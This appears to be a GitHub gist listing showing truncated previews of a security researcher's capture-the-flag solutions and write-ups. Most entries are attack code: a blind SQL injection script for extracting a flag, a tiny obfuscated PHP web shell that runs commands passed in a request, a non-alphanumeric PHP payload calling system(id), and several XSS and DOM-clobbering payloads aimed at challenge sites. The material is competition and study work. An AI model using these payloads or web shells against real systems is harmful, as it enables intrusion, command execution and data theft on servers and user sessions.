@terjanq
terjanq / exploit.js
Last active May 12, 2023 00:23
This is a solution to Oracle v2 and Oracle v1 from https://nn9ed.ka0labs.org/challenges#x-oracle%20v2 (I realized I could use <meta> to redirect the admin to my website and run the challenge in iframes after I had already solved it by bruteforcing the admin :p)
const fetch = require('node-fetch');
var flag = 'nn9ed{'
var alph = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!().{}'
var escape = d => d.replace(/\\/g, '\\\\').replace(/\./g, '\\.').replace(/\(/g, '\\(').replace(/\)/g, '\\)').replace(/\{/g, '\\{').replace(/\}/g, '\\}');
var make_payload = (i, o) => `Season 6%' AND 1=IF(ORD(SUBSTR(flag,${i},1))=${o},1,EXP(44444)) #` // throws an exception if the character of flag is incorrect
const base_url = 'http://x-oracle-v2.nn9ed.ka0labs.org/'
// Generates definitions for fonts
function generateFonts() {
terjanq / rev_shell.php
Last active March 3, 2023 20:20
The shortest non-alphanumeric reverse shell script (19 bytes)
<?=`{${~"\xa0\xb8\xba\xab"}["\xa0"]}`;
/*
* In terminal:
* $ echo -ne '<?=`{${~\xa0\xb8\xba\xab}[\xa0]}`;' > rev_shell.php
* This is how the code is produced: \xa0\xb8\xba\xab is
* treated as a constant, therefore no " is needed. It is also not a copyable
* string because of the non-ASCII characters.
*
* Explanation:
terjanq / funny.php
Last active February 23, 2023 14:46
PHPF*ck
/* system(id) */
<?=$Φ=([].Φ)[![]+![]+![]]?><?=$Χ=++$Φ?><?=$Ψ=++$Χ?><?=$Ω=++$Ψ?><?=$Ϊ=++$Ω?><?=$Ϋ=++$Ϊ?><?=$ά=++$Ϋ?><?=$έ=++$ά?><?=$ή=++$έ?><?=$ί=++$ή?><?=$ΰ=++$ί?><?=$α=++$ΰ?><?=$β=++$α?><?=$γ=++$β?><?=$δ=++$γ?><?=$ε=++$δ?><?=$ζ=++$ε?><?=$η=++$ζ?><?=$θ=++$η?><?=$ι=++$θ?><?=$κ=++$ι?><?=$λ=++$κ?><?=$μ=++$λ?><?=$ν=++$μ?><?=$ξ=++$ν?><?=$ο=++$ξ?><?=$ο=([].Φ)[![]+![]+![]]?><?=($η.$ν.$η.$θ.$Ω.$α)($έ.$Ψ)?>
<!--
Explanation:
- Some of the characters might look like alphanumeric, but they are Unicode characters.
- 'ArrayΦ' <-> [].Φ
- 1 <-> ![]
- 'a' <-> ([].Φ)[![]+![]+![]]
terjanq / calc.html
Last active February 6, 2023 15:10
SekaiCTF 2022 solutions
<html>
<body>
<script>
// clobber document.getElementById and make window.calc.contentWindow undefined
open('https://obligatory-calc.ctf.sekai.team/?expr="<form name=getElementById id=calc>"');
function start(){
var ifr = document.createElement('iframe');
// create sandboxed domain, open challenge page and force its origin to be null
// null origin makes window.token undefined because of the error when accessing document.cookie
terjanq / HTPL-solution.html
Last active November 6, 2022 22:11
Hack.lu 2022 CTF solutions
<!--
This was a sandboxing challenge where the JS language is presented in the form of an exotic, made-up language.
It's almost properly sandboxed, but there is one bug that players needed to find.
The bug I found was to construct an HTML comment (<!--) that is understood by JS and which makes it possible to ignore one semicolon
and then to concat an array expression with a variable name, like $var$['eval']. To get a reference to eval we used DOM clobbering
and defined <iframe name=$win$>
-->
<iframe name=$win$></iframe>
<x-program>
terjanq / real-monster.html
Created November 6, 2022 10:23
The Real Monster
<iframe name="xxx"></iframe>
<form method=POST target=xxx action="https://ctftime.pl/login">
<input name="username" value='<script>eval(unescape(location.hash.slice(1)))</script>","password":"123"};SameSite=none;Secure;Path=/profile;'>
<input name="password" value="123">
</form>
<script>
(async () =>{
const sleep = d => new Promise(r=>setTimeout(r,d));
terjanq / README.md
Last active July 6, 2022 07:13
Postviewer challenge writeup from GoogleCTF 2022

Postviewer - writeup

Challenge's overview

The rumor tells that adm1n stores their secret split into multiple documents. Can you catch 'em all? https://postviewer-web.2022.ctfcompetition.com

The challenge consisted of a simple, entirely client-side page, i.e. no backend code was involved. A user can upload any file, which is then stored locally in indexedDB. They can preview their files either by clicking on the title or by visiting the file's URL, for example https://postviewer-web.2022.ctfcompetition.com/#file-01d6039e3e157ebcbbf6b2f7cb2dc678f3b9214d. The preview of the file is rendered inside a blob created from a data: URL. The rendering occurs by sending the file's contents to the iframe via postMessage({ body, mimeType }, '*').

Additionally, there is a /bot endpoint which lets players send URLs to an xss-bot imitating another user. The goal is to steal their documents.

terjanq / secdriven.md
Last active June 18, 2022 11:58
A TL;DR solution to Security Driven by @terjanq

A TL;DR solution to Security Driven by @terjanq

For this year's Google CTF, I prepared a challenge that is based on a real-world vulnerability. The challenge wasn't solved by any team during the competition so here is the proof that the challenge was in fact solvable! :)

The goal of the challenge was to send a malicious file to the admin and leak their file with a flag. The ID of the file was embedded into the challenge description (/file?id=133711377731) and only the admin had access to it, because the file was private.

Disclaimer: this write-up was written on an airplane, therefore its quality is poor; it mostly showcases the steps required to solve the challenge.

terjanq / README.md
Last active October 23, 2021 14:18
TokyoWesterns CTF 2020 | writeups by @terjanq

TokyoWesterns CTF 2020 | writeups by @terjanq

Urlcheck v1 (98 points, 160 solves)

The goal was to bypass WAF protection to access local resources.

app.re_ip = re.compile('\A(\d+)\.(\d+)\.(\d+)\.(\d+)\Z')

def valid_ip(ip):
 matches = app.re_ip.match(ip)
terjanq / writeup.md
Last active May 20, 2021 01:43
Politer Note - writeup

Write-up

Solution

<a id=bad1 href='cid:="</div">'>
<a id=good1 href="cid:></script><iframe srcdoc='$'">

<a id=bad2 href="http://politernotepad.zajebistyc.tf/static/badwords.js">
<a id=good2 href='data:,alert(/greetings from terjanq/)"></script>'>